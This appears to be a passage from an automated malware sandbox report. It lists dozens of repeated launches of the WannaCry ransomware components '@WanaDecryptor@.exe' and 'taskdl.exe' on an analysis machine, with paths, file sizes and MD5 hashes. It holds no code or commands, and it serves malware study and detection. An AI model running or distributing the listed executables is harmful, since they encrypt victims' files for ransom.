                                                                              Start time:02:43:37
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:144
                                                                              Start time:02:43:37
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:145
                                                                              Start time:02:43:37
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:146
                                                                              Start time:02:43:37
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:147
                                                                              Start time:02:43:37
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:148
                                                                              Start time:02:43:37
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:149
                                                                              Start time:02:43:37
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:150
                                                                              Start time:02:43:37
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:151
                                                                              Start time:02:43:38
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:152
                                                                              Start time:02:43:38
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:153
                                                                              Start time:02:43:38
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:154
                                                                              Start time:02:43:38
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:155
                                                                              Start time:02:43:38
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:156
                                                                              Start time:02:43:38
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:157
                                                                              Start time:02:43:38
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:158
                                                                              Start time:02:43:38
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:159
                                                                              Start time:02:43:38
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:160
                                                                              Start time:02:43:38
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:161
                                                                              Start time:02:43:38
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:162
                                                                              Start time:02:43:38
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:163
                                                                              Start time:02:43:39
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:164
                                                                              Start time:02:43:39
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:165
                                                                              Start time:02:43:39
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:166
                                                                              Start time:02:43:39
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:167
                                                                              Start time:02:43:39
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:168
                                                                              Start time:02:43:39
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:169
                                                                              Start time:02:43:39
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:170
                                                                              Start time:02:43:39
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:171
                                                                              Start time:02:43:39
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:172
                                                                              Start time:02:43:39
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x7ff6f3f20000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:173
                                                                              Start time:02:43:39
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:174
                                                                              Start time:02:43:39
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:175
                                                                              Start time:02:43:40
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:176
                                                                              Start time:02:43:40
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:177
                                                                              Start time:02:43:40
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:178
                                                                              Start time:02:43:40
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:179
                                                                              Start time:02:43:40
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:180
                                                                              Start time:02:43:40
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:181
                                                                              Start time:02:43:40
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:182
                                                                              Start time:02:43:40
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:183
                                                                              Start time:02:43:40
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:184
                                                                              Start time:02:43:40
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:185
                                                                              Start time:02:43:40
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:186
                                                                              Start time:02:43:41
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:187
                                                                              Start time:02:43:41
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:188
                                                                              Start time:02:43:41
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:189
                                                                              Start time:02:43:41
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:190
                                                                              Start time:02:43:41
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:191
                                                                              Start time:02:43:41
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:192
                                                                              Start time:02:43:41
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:193
                                                                              Start time:02:43:41
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:194
                                                                              Start time:02:43:41
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:195
                                                                              Start time:02:43:41
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:196
                                                                              Start time:02:43:41
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:197
                                                                              Start time:02:43:42
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:198
                                                                              Start time:02:43:42
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:199
                                                                              Start time:02:43:42
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:200
                                                                              Start time:02:43:42
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:201
                                                                              Start time:02:43:42
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:202
                                                                              Start time:02:43:42
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:203
                                                                              Start time:02:43:42
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

